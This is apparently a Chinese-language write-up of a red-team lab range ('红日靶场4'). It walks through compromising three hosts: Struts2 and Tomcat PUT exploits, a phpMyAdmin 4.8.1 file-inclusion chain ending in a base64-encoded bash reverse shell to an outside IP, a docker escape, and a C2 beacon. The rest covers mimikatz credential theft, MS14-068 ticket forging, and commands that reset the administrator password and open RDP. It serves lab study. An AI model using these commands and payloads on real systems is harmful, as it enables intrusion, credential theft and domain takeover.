红日靶场4— #
一共三台主机 一台双网卡1公网和内网网段 还有两台一台DC 一台WIN7 内网网段为183
Getshell #
发现公网开了3个奇怪端口我们访问
2001端口getshell #
2001一看就是Struct2 直接工具getshell 第一个———2001
上传JSP哥斯拉getshell
2002端口 #
没有管理界面
https://www.exploit-db.com/exploits/42953 tomcat PUT CVE
PUT /1.jsp/ HTTP/1.1
Host: 192.168.3.103:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://192.168.3.103:8080/examples/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4,zh-TW;q=0.2
Cookie: JSESSIONID=A27674F21B3308B4D893205FD2E2BF94
Connection: close
Content-Length: 26
<% out.println("hello");%>
这里我们写入哥斯拉的shell连接
2003端口 #
里面右下角有admin版本4.8.1
POC利用
phpmyadmin 4.8.1 远程文件包含漏洞 利用
http://192.168.1.188:2003/index.php?target=db_datadict.php%253f/../../../../../../
etc/passwd
我们可以包含
执行 SELECT '<?php phpinfo();?>' 时,PHP 会把查询结果(即字符串 <?php phpinfo();?> )通过 Session 机制存储(比如写入 $_SESSION 或直接落地到 Session 文件)。
---Session 的本质是 “服务器存储用户数据的容器”,并非只能存 “登录信息” 。--
select '<?php phpinfo();?>' 这个session
旧版本:sess_ + session_id
新版本:可能直接用 session_id,但历史场景中大量存在 sess_ 前缀的习惯。
通常在/tmp
http://192.168.1.188:2003/index.php?target=db_datadict.php%253f/../../../../../../
tmp/sess_6dd19ff2088d22ac4b1bfb67db1a68a5
select '<?php system(base64_decode("YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xMTYuNjIuMzIuNjQvODA4MCAwPiYxIg==")) ?>' 反弹
看下session
反弹shell
docker提权 #
tomcatshell里面发现了是在docker环境
并且是特权 我们可以使用挂载逃逸
把/dev/sda1 挂载过去 建立文件夹 niko下面
写入公钥到root里面
登录试试
这里仅仅限制tomcat docker提权 其余两个shell没找到提权方法
这里我也试了定时任务但是就是不行
并且可以看到确定是写入进去了的
最后还是密钥登录拿到web全部权限
内网渗透 #
启动我们的CS上线下第一台linux shell 这里用插件linux上线
genCrossC2.Linux ip tcp ./.cobaltstrike.beacon_keys null Linux x64 3.out
生成开一个python3 对面用wget下载执行上线
成功上线web
发现另外一张网卡183 我们可以扫描下
fsCAN扫描结果
这里我用CS建立linux隧道没有成功换一个C2工具
本地可以访问内网了使用ms17010扫描
然后用msfconsle代理下socks扫描
use auxiliary/scanner/smb/smb_ms17_010
set rhost 192.168.183.129
setg Proxies socks5:116.62.32.64:36666
拿下了win7
使用mimikatz抓取密码开启3389登录上去
然后使用MS14-068 注入但是我这里不知道为什么一直不成功
命令如下生成后注入进去
这里修改管理员密码
net user administrator Admin12345
net user administrator Admin12345 /active:yes 后激活rdp
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 打开3389
登录使用ms14-068
cd \Users\douser\Desktop
MS14-068.exe -u douser@DEMO.com -s S-1-5-21-979886063-1111900045-1414766810-1107 -d 192.168.183.131 -p Dotest123
mimikatz.exe
kerberos::purge 清空
kerberos::list
kerberos::ptc TGT_douser@DEMO.com.ccache
dir \\WIN-ENS2VR5TR3N\C$
然后可以访问DC C盘
我这里能是建立了连接net use 如果你成功了注入了可以直接执行
下一步就是有了最高权限就是关闭防火墙这时候能用ms17010打DC了
